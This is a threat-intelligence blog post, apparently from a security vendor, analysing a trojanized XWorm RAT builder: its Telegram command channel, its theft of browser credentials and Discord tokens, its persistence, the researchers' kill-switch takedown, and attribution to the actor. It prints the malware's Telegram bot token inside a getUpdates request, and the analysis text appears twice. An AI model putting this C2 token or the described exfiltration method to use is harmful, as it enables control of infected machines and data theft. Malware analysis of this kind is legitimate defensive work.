🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
Discover how a trojanized version of the XWorm RAT builder exploited novice cybersecurity enthusiasts, spreading malware through GitHub, Telegram, and file-sharing platforms to compromise over 18,000 devices globally. This malicious tool exfiltrates sensitive data, employs advanced virtualization and registry techniques, and operates via Telegram-based command-and-control servers. Learn about the identified threat actors, their operational methods, and the disruption efforts that leveraged the malware's "kill switch" to mitigate its impact. Stay informed on proactive measures to protect against evolving cybersecurity threats.
Proactively monitor and defend your organization against threats from the dark web with CloudSEK XVigil.
Schedule a DemoA trojanized version of the XWorm RAT builder has been weaponized and propagated. It is targeted specially towards script kiddies who are new to cybersecurity and directly download and use tools mentioned in various tutorials thus showing that there is no honour among thieves. The malware is spread primarily through a Github repo but also uses other file-sharing services. It has so far compromised over 18,459 devices globally, is capable of exfiltrating sensitive data like browser credentials, Discord tokens, Telegram data, and system information. The malware also features advanced functionality, including virtualization checks, registry modifications, and a wide array of commands enabling full control over infected systems. Top victim countries include Russia, USA, India, Ukraine, and Turkey.
The malware uses Telegram as its command-and-control (C&C) infrastructure, leveraging bot tokens and API calls to issue commands to infected devices and exfiltrate stolen data. Analysis revealed the malware has so far exfiltrated more than 1 GB of browser credentials from multiple devices. Researchers also identified the malware's "kill switch" feature, which was leveraged to disrupt operations on active devices.
Disruption efforts targeted the malware's botnet by exploiting its uninstall command. While effective for active devices, limitations such as offline machines and Telegram's rate-limiting posed challenges. Attribution efforts linked the operation to a threat actor using aliases like "@shinyenigma" and "@milleniumrat" as well as GitHub accounts and a ProtonMail address..
The rise of sophisticated Remote Access Trojans (RATs) has amplified cyber threats, with XWorm emerging as a significant example. Recently, a Trojanized XWorm RAT builder has been identified, being propagated by threat actors via multiple channels such as GitHub repositories, file-sharing services, Telegram channels, and forums. This was specifically targeted towards script kiddies who are new to cybersecurity and use tools mentioned in various tutorials. This builder provides attackers with a streamlined tool to deploy and operate a highly capable RAT, which features advanced capabilities like system reconnaissance, data exfiltration, and command execution.
This analysis aims to provide detailed insights into the delivery, functionality, and impact of this Trojanized XWorm RAT builder. By leveraging data exfiltrated via Telegram, we uncovered the infection sources, mapped its command-and-control (C&C) mechanisms, and identified the breadth of its capabilities and the affected devices. Additionally, we conducted disruption activities targeting the botnet infrastructure to mitigate its operations.
We utilized telegram API to forward messages exfiltrated using the bot to an account of our control. Based on the messages obtained, we did an OCR on the images that were basically screen captures of the devices infected by the malware. From those we filtered out the URLs and were able to get sources of infection which were as follows:
The malware check for Virtualization on the system by reading registry keys. The keys associated with NdisVirtualBus and VirtualRender are more likely to exist in virtualized environments because they deal with virtual device interfaces for networking and graphics. Thus, if the malware detects that it is being run in a virtual environment, it does not spread the infection further.
XWorm also modifies various registry entries. When the command “/machine_id*startupadd” is called from the C&C server, the malware adds entries to the Windows Registry to ensure it executes upon system startup. By modifying specific registry keys, the malware can automatically run its payload each time the system boots, thereby maintaining continuous access.
The malware uses telegram as its control and command server. The malware executables are hardcoded with a telegram bot id and bot token which are as follows:
Upon first execution, the malware sends a request to “http://ip-api.com/json/” to check the IP address and location details of the compromised machine. After which it gathers all the saved passwords from the browsers and sends it via the sendDocument endpoint of the telegram API.
Then the malware also forwards the discord tokens it has found via the sendMessage endpoint of telegram API.
Thereafter, the malware exfiltrates the system information of the victim and forwards it to the telegram API via sendMessage.
In some cases, the malware also takes the screenshots of the system once it is infected and also steals the telegram data in case telegram is installed on the device. Finally it sends the device connected message to the telegram chat along with the location (obtained from ip-api.com) and machine id of the device which was compromised.
Now that this data has been exfiltrated, the malware lays dormant waiting for incoming commands from the C&C server. It uses the getUpdates method of telegram API to listen to any incoming commands for the infected machine. The command usually looks like /machine_id*command. If an attacker sends any command in such a format to the telegram bot, the infected machine can pick it from there and execute commands accordingly.
Request
GET /bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-1 HTTP/1.1
Host: api.telegram.org
The malware waiting for commands via telegram API’s getUpdates
The exhaustive list of commands that the infected machines obey are as follows:
Using a certain technique we were able to dump the entire data that was exfiltrated via Telegram by the malware. Our findings show that so far the malware has compromised more than 18459 devices. The top 5 countries affected by the trojanized RAT builder are as follows:
However, out of the 18459+ devices infected, browser credentials have been stolen from only 2068 devices so far. The data exfiltrated by the malware is as follows:
In one instance each pdf and mp3 file was downloaded from the victim just to test if they contained anything sensitive. The volume wise breakdown of the data exfiltrated is as follows:
The infected machines were working like a botnet, listening for commands via the telegram API. During our observation we found that the malware has a feature that acts as a ‘kill switch’ of sorts that can be called from the telegram messages sent to the bot by the threat actors.
The malware included a command /uninstall which had been used by the threat actor in the past to remove the malware infection from a machine using its machine ID.
So, there were 3 things required to remove the infection from a device:
Machine IDs we had collected from the chats and the telegram bot username was obtained via the getMe endpoint of telegram API. Combining the two we made two bursts of messages to the bot:
During that duration, any machine that was actively listening to the messages and had its machine ID matched would automatically remove the malware from it. The screenshot below shows the getUpdates message that the machine would see at the time of our message bursts.
In the initial few messages dumped from the telegram bot, we saw that there was a .rdp file uploaded to an infected machine by the threat actors. It can be said with moderate confidence that it was being used for testing purposes by the threat actors. The AWS address in the RDP file was “ec2-18-191-85-60.us-east-2.compute.amazonaws.com”.
From the commit messages on the repositories where the threat actor shared the trojanized RAT builder, we obtained the following email address: [email protected]. In the past the same threat actor has used multiple Github accounts such as:
Telegram Channel Username offering the RAT: @milleniumrat
Telegram username of the threat actor: @shinyenigma
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
13
min read
Discover how a trojanized version of the XWorm RAT builder exploited novice cybersecurity enthusiasts, spreading malware through GitHub, Telegram, and file-sharing platforms to compromise over 18,000 devices globally. This malicious tool exfiltrates sensitive data, employs advanced virtualization and registry techniques, and operates via Telegram-based command-and-control servers. Learn about the identified threat actors, their operational methods, and the disruption efforts that leveraged the malware's "kill switch" to mitigate its impact. Stay informed on proactive measures to protect against evolving cybersecurity threats.
A trojanized version of the XWorm RAT builder has been weaponized and propagated. It is targeted specially towards script kiddies who are new to cybersecurity and directly download and use tools mentioned in various tutorials thus showing that there is no honour among thieves. The malware is spread primarily through a Github repo but also uses other file-sharing services. It has so far compromised over 18,459 devices globally, is capable of exfiltrating sensitive data like browser credentials, Discord tokens, Telegram data, and system information. The malware also features advanced functionality, including virtualization checks, registry modifications, and a wide array of commands enabling full control over infected systems. Top victim countries include Russia, USA, India, Ukraine, and Turkey.
The malware uses Telegram as its command-and-control (C&C) infrastructure, leveraging bot tokens and API calls to issue commands to infected devices and exfiltrate stolen data. Analysis revealed the malware has so far exfiltrated more than 1 GB of browser credentials from multiple devices. Researchers also identified the malware's "kill switch" feature, which was leveraged to disrupt operations on active devices.
Disruption efforts targeted the malware's botnet by exploiting its uninstall command. While effective for active devices, limitations such as offline machines and Telegram's rate-limiting posed challenges. Attribution efforts linked the operation to a threat actor using aliases like "@shinyenigma" and "@milleniumrat" as well as GitHub accounts and a ProtonMail address..
The rise of sophisticated Remote Access Trojans (RATs) has amplified cyber threats, with XWorm emerging as a significant example. Recently, a Trojanized XWorm RAT builder has been identified, being propagated by threat actors via multiple channels such as GitHub repositories, file-sharing services, Telegram channels, and forums. This was specifically targeted towards script kiddies who are new to cybersecurity and use tools mentioned in various tutorials. This builder provides attackers with a streamlined tool to deploy and operate a highly capable RAT, which features advanced capabilities like system reconnaissance, data exfiltration, and command execution.
This analysis aims to provide detailed insights into the delivery, functionality, and impact of this Trojanized XWorm RAT builder. By leveraging data exfiltrated via Telegram, we uncovered the infection sources, mapped its command-and-control (C&C) mechanisms, and identified the breadth of its capabilities and the affected devices. Additionally, we conducted disruption activities targeting the botnet infrastructure to mitigate its operations.
We utilized telegram API to forward messages exfiltrated using the bot to an account of our control. Based on the messages obtained, we did an OCR on the images that were basically screen captures of the devices infected by the malware. From those we filtered out the URLs and were able to get sources of infection which were as follows:
The malware check for Virtualization on the system by reading registry keys. The keys associated with NdisVirtualBus and VirtualRender are more likely to exist in virtualized environments because they deal with virtual device interfaces for networking and graphics. Thus, if the malware detects that it is being run in a virtual environment, it does not spread the infection further.
XWorm also modifies various registry entries. When the command “/machine_id*startupadd” is called from the C&C server, the malware adds entries to the Windows Registry to ensure it executes upon system startup. By modifying specific registry keys, the malware can automatically run its payload each time the system boots, thereby maintaining continuous access.
The malware uses telegram as its control and command server. The malware executables are hardcoded with a telegram bot id and bot token which are as follows:
Upon first execution, the malware sends a request to “http://ip-api.com/json/” to check the IP address and location details of the compromised machine. After which it gathers all the saved passwords from the browsers and sends it via the sendDocument endpoint of the telegram API.
Then the malware also forwards the discord tokens it has found via the sendMessage endpoint of telegram API.
Thereafter, the malware exfiltrates the system information of the victim and forwards it to the telegram API via sendMessage.
In some cases, the malware also takes the screenshots of the system once it is infected and also steals the telegram data in case telegram is installed on the device. Finally it sends the device connected message to the telegram chat along with the location (obtained from ip-api.com) and machine id of the device which was compromised.
Now that this data has been exfiltrated, the malware lays dormant waiting for incoming commands from the C&C server. It uses the getUpdates method of telegram API to listen to any incoming commands for the infected machine. The command usually looks like /machine_id*command. If an attacker sends any command in such a format to the telegram bot, the infected machine can pick it from there and execute commands accordingly.
Request
GET /bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-1 HTTP/1.1
Host: api.telegram.org
The malware waiting for commands via telegram API’s getUpdates
The exhaustive list of commands that the infected machines obey are as follows:
Using a certain technique we were able to dump the entire data that was exfiltrated via Telegram by the malware. Our findings show that so far the malware has compromised more than 18459 devices. The top 5 countries affected by the trojanized RAT builder are as follows:
However, out of the 18459+ devices infected, browser credentials have been stolen from only 2068 devices so far. The data exfiltrated by the malware is as follows:
In one instance each pdf and mp3 file was downloaded from the victim just to test if they contained anything sensitive. The volume wise breakdown of the data exfiltrated is as follows:
The infected machines were working like a botnet, listening for commands via the telegram API. During our observation we found that the malware has a feature that acts as a ‘kill switch’ of sorts that can be called from the telegram messages sent to the bot by the threat actors.
The malware included a command /uninstall which had been used by the threat actor in the past to remove the malware infection from a machine using its machine ID.
So, there were 3 things required to remove the infection from a device:
Machine IDs we had collected from the chats and the telegram bot username was obtained via the getMe endpoint of telegram API. Combining the two we made two bursts of messages to the bot:
During that duration, any machine that was actively listening to the messages and had its machine ID matched would automatically remove the malware from it. The screenshot below shows the getUpdates message that the machine would see at the time of our message bursts.
In the initial few messages dumped from the telegram bot, we saw that there was a .rdp file uploaded to an infected machine by the threat actors. It can be said with moderate confidence that it was being used for testing purposes by the threat actors. The AWS address in the RDP file was “ec2-18-191-85-60.us-east-2.compute.amazonaws.com”.
From the commit messages on the repositories where the threat actor shared the trojanized RAT builder, we obtained the following email address: [email protected]. In the past the same threat actor has used multiple Github accounts such as:
Telegram Channel Username offering the RAT: @milleniumrat
Telegram username of the threat actor: @shinyenigma